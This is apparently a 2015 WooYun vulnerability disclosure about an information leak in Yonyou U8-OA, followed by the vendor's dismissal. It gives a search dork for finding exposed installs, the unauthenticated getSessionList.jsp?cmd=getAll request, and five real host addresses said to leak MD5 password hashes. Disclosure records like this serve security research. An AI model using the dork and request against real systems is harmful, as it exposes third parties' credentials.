漏洞概要
关注数(24)
关注此漏洞
漏洞标题:用友U8-OA泄漏敏感信息
提交时间:2015-12-05 23:42
修复时间:2015-12-07 16:35
公开时间:2015-12-07 16:35
漏洞类型:敏感信息泄露
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2015-12-05: 细节已通知厂商并且等待厂商处理中
2015-12-07: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
66666666666666
详细说明:
https://g.jiuminghu.com/#newwindow=1&q=intitle:%E3%80%8A%E7%94%A8%E5%8F%8BU8-OA%E3%80%8B&btnK=+%E6%90%9C%E7%B4%A2
intitle:《用友U8-OA》
案例:
http://122.227.235.74:4389/yyoa/ext/https/getSessionList.jsp?cmd=getAll
http://www.lygdfyy.com.cn:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll
http://222.175.187.147:8081/yyoa/ext/https/getSessionList.jsp?cmd=getAll
http://222.189.156.67:8089/yyoa/ext/https/getSessionList.jsp?cmd=getAll
http://www.hxgroup.co:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll
5个案例泄漏的是密码md5值。
漏洞证明:
修复方案:
版权声明:转载请注明来源 陆由乙@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-12-07 16:35
厂商回复:
非常感谢您对用友的关注,目前此产品已不在用友体系,请联系隔壁小伙伴致远协创,谢谢。--> http://www.wooyun.org/corps/%E5%8C%97%E4%BA%AC%E8%87%B4%E8%BF%9C%E5%8D%8F%E5%88%9B%E8%BD%AF%E4%BB%B6%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8
最新状态:
暂无